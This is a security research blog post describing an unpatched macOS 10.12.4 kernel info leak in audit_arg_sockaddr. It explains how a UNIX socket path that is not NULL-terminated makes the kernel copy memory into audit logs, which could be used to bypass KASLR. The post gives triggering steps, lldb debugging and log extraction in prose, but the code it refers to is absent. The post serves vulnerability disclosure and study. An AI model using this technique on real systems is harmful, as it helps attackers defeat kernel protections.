Two Bugs, One Func() part 2

Share

> part ii: a kernel info leak 0day, thanks to Apple’s fix

Aloha it’s Patrick, Chief Security Researcher at Synack. In my free time, I also run a small OS X security website objective-see.com, where I share my personal OS X security tools and blog about OS X security and coding topics. Below is one such post originally published on my site, which discusses one of my tools and more generally once way to monitor processing creation on OS X. Read & enjoy!

Background
The first part of this multi-series blog post showed how to track down the cause of a kernel panic on macOS 10.12.3. In short, turned out that if a UNIX socket structure (sockaddr_un) was allocated exactly at the end of a memory page with an unmapped page adjacent, an off-one-error read error would trigger a kernel panic if auditing was enabled:

Sure you could panic a system, however, as far as I could tell this bug was not exploitable. That is to say, from a security point of view it was rather uninteresting.

For this second blog post, I originally planned to briefly cover Apple’s fix for this bug, before diving into a second more serious bug I discovered within the same audit_arg_sockaddr function. This second bug, a ring-0 heap overflow, provided a mechanism to execute arbitrary code within the context of the kernel. Ya, quite bad!

However after spending about 2 seconds looking at their ‘fix’ (released in macOS 10.12.4), it was apparent that not only did it not address the issue, but actually made things far worse by introducing a new security vulnerability 🙁 Note that at this time, this bug is a 0day – though requires network level (‘nt’) auditing be enabled (which can be turned on with root privileges).

Recall that the buggy code in macOS 10.12.3 was simply trying to make a copy of a UNIX socket’s path, sun_path, for auditing purposes. Since such socket paths do not have to be NULL-terminated, the code attempted to account for this…and did so almost correctly. As we showed in the previous blog though, the following chunk of Apple code, sun->sun_path[slen] != 0 contains an off-one-error read error that could lead to a kernel panic:

This fix makes absolutely zero-sense – and actually introduces an even worse bug! Why? In short, strlcpy simply copies until it finds a NULL (0x0) or until the destination buffer (‘path’) is full. As UNIX socket paths (sun_path) don’t have to be NULL-terminated this code can still panic the box (as it reads past the end of the sockaddr_un structure), or worse yet leaks random kernel memory into an audit path that’s accessible in user-mode! #facepalm

Let’s take a closer look at all of this. First showing how to create a UNIX socket that triggers this buggy code, and then dynamically debugging the vulnerability in ring-0. We’ll end by showing how to dump kernel memory into user mode, thanks to Apple’s new ‘fix’ 😛

UNIX Sockets
First one of my favorite nerd jokes:

Now that’s out of the way, let’s show how to create a UNIX socket that has a non-NULL-terminated path. Recall that UNIX sockets are described via the sockaddr_un structure, which is declared in sys/un.h:

Creating a UNIX socket is simple! First, create a socket of type AF_UNIX then initialize a sockaddr_un structure with the socket’s path. Pass this to the bind function to, well bind, the path to the socket. Confirm via the getsockname function.

When run, the following code successfully creates a UNIX socket, binds it to /tmp/unixSocket, then retrieves the bound name in order to print it out.

Since the open-source part of macOS 10.12.4 was just released, it is pretty easy to see what’s going on behind the scenes. Specifically let’s look at how a path such as ‘/tmp/unixSocket’ gets bound to a socket.

The bind function is implemented in the kernel, within the uipc_syscalls.c file. After various sanity checks bind invokes either the getsockaddr or getsockaddr_s function to bind the path the socket:

Pretty straightforward, ya? The most interesting for us here though, is to note that nothing in this code ensures that the socket path is NULL-terminated (copyin just does a straight byte-by-byte copy). This is by design, for reasons explained in the following quote:

“Note that bind() is a generic system call. Its definition allows it to be used for many different address familys, each of which has a different format for addresses. For UNIX domain socket, they are path names. For INET sockets, they are 32-bit internet addresses. The bind() code cannot make any assumptions about the format of the address, it just copies it in as an opaque object.” (source)

Other sources such as ‘Addressing within the AF_UNIX Domain’ confirm this, stating, “The sun_path field contains the name of the file which represents the open socket. It need not be null delimited.”

However, it should be noted that since code within both getsockaddr and getsockaddr_s (such as bzero(ss, sizeof (*ss))) zeros out the entire sockaddr_storage structure before copying in the name – if the length of the socket path doesn’t take up the full (entire) struct sockaddr_storage (‘ss’) it will inadvertently be NULL-terminated. This just means, create a long enough path and it won’t be terminated with a NULL (0x0).

Below is a snippet of code that creates a ‘legal’ socket path that does fill up the entire structure, thus ensuring it is not NULL-terminated.

What’s special about the size 128? This is the maximum size (‘_SS_MAXSIZE’) of a struct sockaddr_storage, the structure getsockaddr_s populates with the path name. This structure is declared in bsd/sys/socket.h:

Executing the above code, creates a UNIX socket that fully fills up a sockaddr_storage structure, thus ensuring the path component is not NULL-terminated. Again, this is perfectly legal as there is nothing saying the path has to be NULL-terminated 🙂

If auditing is enabled, the audit_arg_sockaddr function will be invoked to audit socket operations, such as when a UNIX socket is bound. Again; here is Apple’s new (macOS 10.12.4) code for auditing UNIX sockets within the audit_arg_sockaddr function:

In short, it tries to make a copy (via the strlcpy function) of the socket’s path. The source buffer is the UNIX socket’s path, sun_path, while the destination is a variable named ‘path’.

The first (obvious?) issue is that since the UNIX socket’s path, sun_path, isn’t NULL terminated, strlcpy will just keep copying random bytes into ‘path’ until it encounters a NULL (0x0), or until the ‘path’ buffer (size: SOCK_MAXADDRLEN – 2 + 1 = 254) is filled up. If sensitive kernel memory (pointers, etc) are found adjacent to the UNIX socket structure, these could be (partially) copied into the path buffer. The following diagram illustrates this foo’bar’d copy, showing the strlcpy copying ‘extra’ bytes into ‘path’ until it encounters a NULL:

This may be used to bypass KALSR as the path (now appended with random kernel data) is propagated to user-mode (specifically, it makes it way into the audit database):

Generate a ‘Non-Maskable Interrupt’ (NMI)
On the debuggee machine (the VM), hit command+alt+control+shift+esc (all at once) to generate a non-maskable interrupt. This will trigger a catchable debug event!

Connect to the Debuggee
Hop back to the debugger machine (the host) and type: kdp-remote <ip addr of vm>

Since this breakpoint will be triggered countless times (anytime any code on the system binds an address or path to a socket), let’s instruct the debugger to only break on certain sockets. Specifically ones that are exactly 128 bytes in length (i.e. the ‘evil’ UNIX sockets we are creating with non-NULL-terminated paths). We can do this with the br ‘mod’ command. Note that the size of the socket being passed into bind will be at offset +0x10 within a structure pointed to by $RSI:

(lldb) br mod -c ‘*(int*)($rsi+0x10)==128’

In the VM (the macOS instance we are debugging), execute the code that creates a UNIX socket with an non-NULL-terminated path:

We cannot (yet) access the name (at address 140241106108416/0x7f8c6d500000), as that’s a user-mode address (which AFAIK, can’t be directly accessed via lldb in the context of the kernel). But no worries, we just set a breakpoint just after the copyin function call (in the getsockaddr_s function – which actually has been compiled inline, into the bind function). As copyin copies the UNIX socket’s name into kernel mode, it will then be viewable in the debugger.

With auditing is enabled on the VM, set a breakpoint within audit_arg_sockaddr, the buggy function. Specifically, set a breakpoint on the code within the function that handles the auditing of UNIX sockets (address: 0xffffff8010120e47):

Number of Bytes Copied: 127 ($RAX)
Recall the path of the UNIX socket, sun_path, starts at offset 0x2 inside the sockaddr_un structure. Since the socket we created was 128 bytes, this means the path is 126 (128 – 2). Since 127 bytes were copied, this means one extra 1 byte outside the socket was leaked ‘into’ the ‘path’ variable.

Why just one? If we dump the memory just past the sockaddr_un structure we can see it happens to be a 0xd7 0x00. The strlcpy function stops when it hits a 0x0 (NULL). Thus only one byte, 0xd7 was copied:

Want to leak more bytes into the path? Of course you do 🙂 Just increase the size of the socket above 128. This will cause the bind function to allocate the socket structure on the heap (via getsockaddr) instead of the stack.

Moreover, there is no limit to the number of times you can leak kernel data. Just keep creating and binding UNIX sockets 🙂

A’ight, so it easy to get the kernel to leak bytes into the audit path for UNIX socket. How do we access this leak in user-mode? That is to say, where do these leaked kernel bytes show up? In the audit log!

Audit logs are stored in /var/audit. If we dump the logs (via hexdump), guess what! there’s the leaked kernel bytes:

Leaking random kernel memory to user-mode is of course a security issue. It’s possible sensitive information (maybe partial hashes, password, etc) by be leaked, or partial pointer addresses that would allow a local attacker to defeat KASLR.

Conclusions
In my last blog post, we discussed an off-by-one bug I found in the macOS 10.12.3 kernel that could cause a kernel panic. I responsible reported this bug to Apple:

I also reported a second bug unique bug, a heap-overflow in the macOS 10.12.3 kernel (stay tuned for a blog on this!). Apple closed both bugs as a duplicate of some other single bug (huh?). Worse though, as we showed in this blog post, their ‘fix’ (in macOS 10.12.4) for the off-by-one bug:

did not fix the kernel panic

introduced a kernel info leak, that could leak sensitive information or be used to bypass KASLR

Though this bug is an unpatched 0day, it requires auditing to be enabled (which can be turned on if you have root privileges). Moreover, accessing (reading) the leaked kernel memory in the audit log requires root privileges.

On macOS though, with root privileges one still cannot bypass SIP, nor load unsigned code into the kernel. Thus advanced attackers, even with root privileges, often will exploit a kernel bug to fully compromise a system. Such bugs, generally require a KASLR bypass… such as the one we described here. Don’t blame me 😉